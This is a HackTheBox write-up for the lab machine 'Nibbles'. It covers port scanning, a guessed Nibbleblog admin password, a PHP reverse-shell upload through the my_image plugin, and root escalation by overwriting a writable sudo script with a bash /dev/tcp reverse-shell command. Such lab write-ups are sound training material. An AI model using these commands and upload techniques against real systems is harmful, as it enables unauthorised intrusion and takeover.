🫡
Writeups
  • What is this website?
  • HackTheBox : Active Directory
    • Cascade
  • HackTheBox : Linux Boxes
    • LaCasaDePapel
    • Nibbles
    • Knife
  • HackTheBox : Other Boxes
    • Sunday
  • Cheat Sheet
    • unfiltered
Powered by GitBook
On this page
  • Port 80 - HTTP
  • Privilege Escalation

Was this helpful?

  1. HackTheBox : Linux Boxes

Nibbles

Last updated 1 month ago

Was this helpful?

Ports Enumeration

# TCP
nmap -vvv 10.10.10.75 -p- -sCV -oA Nibbles
# UDP 
nmap -vvv 10.10.10.75 -sU --top-ports 100 -oA NibblesUDP

we found ssh (20) and http (80)

Port 80 - HTTP

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://10.10.10.75:80/FUZZ -ic

We just get server-status and it's 401 , after using other tools we hit a dead end with having noting

View-source is a broswer function i used to use it for see the hidden function from the user we impersonate and maybe to find comments revealing the version of a cms, for this machine it's revealing a directory that i couldn't get with the wordlists

Nibbleblog

When you find a web application you should gather information about what technology they use. Here the site telling us that it's powerd by nibbleblog and just by searching google we find it.

we find also pages in that github page : * admin.php * install.php * update.php

We need credentials for this login page. Searching the web for a default credentials and we get noting. trying to sql injection to bypass authentication and seems like there is a brute force prevention and blocking us for 5mins.

intsall.php redirecting us to update.php

We now know that the version of nibbleblog is 4.0.3 and now we can search for exploits for it.

And now we have a username that we can brute force it's password. but due the brute force attack prevention they have we are limited to only most used default credentials like admin:admin , admin:root and so on. But yeah we hit a dead-end maybe admin:nibbles and yeah it's working.

We had something like this before and maybe you should add this to your methodology. If you have a machine,webapp or any service try to use it's name as user and password.

We are in, Now we should look for a page that maybe give us RCE usually it's console but this webapp doesn't have someting like this. So maybe upload a script to give us reverse shell. We find a plugin called "my_image" that we can upload to it. I will use pentestmonkey script. Link1 | Link2

use nc to listen for the reverse call from the machine.

nc -nvlp 80

We have a shell but we need to upgrade it

python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl + z
stty raw -echo;fg

Privilege Escalation

Using sudo -l , we find that we can be root when using monitor.sh at /home/nibbler/personal/stuff/ I didn't try to create directories (/personal/stuff/) by my self and then create our .sh file. maybe it would work because we are nibbler and that's our folder.

We get the user.txt and personal.zip

unzip personal.zip , created the directories that are the same we saw in sudo -l Analyzing the file we find that it's used to monitor network. So we can't do much with it

ls -la
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh

We have full permissions on the file. Now we have many paths we could have reverse shell back to our machine

echo "bash -c '/bin/bash -i >& /dev/tcp/10.10.16.9/8000 0>&1'" > monitor.sh

or get a root shell in the same shell we use

echo "bash -c '/bin/bash'" > monitor.sh
Page cover image
http://10.10.10.75/nibbleblog/admin.php
http://10.10.10.75/nibbleblog/update.php
http://10.10.10.75/nibbleblog/content/private/config.xml
php-reverse-shell.php | Change ip and port to yours
http://10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image
https://www.hackthebox.com/achievement/machine/1423703/121